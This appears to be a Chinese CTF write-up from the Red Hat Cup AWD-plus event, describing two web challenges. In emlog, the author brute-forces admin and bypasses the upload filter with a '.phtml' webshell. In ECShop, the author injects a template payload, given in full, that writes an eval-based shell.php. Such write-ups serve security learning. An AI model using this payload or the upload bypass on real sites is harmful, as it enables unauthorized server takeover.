红帽杯线下AWD plus writeup

访问是一个由emlog的博客站点。

直接访问后台,得知存在admin用户对admin进行暴力破解

上传附件处限制了文件类型,发现可添加允许添加后缀名。尝试了php,php5等类似添加后,都会被更改为x类型,最后尝试添加phtml,成功添加。

然后直接去写文章处添加附件,并上传后缀为pthml的一句话

成功上传后,右键附件复制链接地址,上菜刀,成功getshell。并在根目录下找到flag

粤湾租赁

访问web题目,系统为ecshopcms,发现两个登录处,一个是前台登陆,一个是后台登陆,前台登陆并未发现什么可以拿下的点。

已知存在admin用户,进行爆破

ecshop有已知的getshell方法,

直接在模板管理–语言项编辑直接修改来写入shell文件;搜索关键字:用户信息;用户信息四个字一定不要删除,在之后添加:(base64加密去掉了最后的=号)

1.${${fputs(fopen(base64_decode(c2hlbGwucGhw),w), base64_decode(PD9waHAgZXZhbCgkX1BPU1RbJ2gnXSk7Pz3))}}

而后保存,保存后访问user.php即可在根目录下生成shell.php的shell。然后上菜刀,成功在根目录获得flag。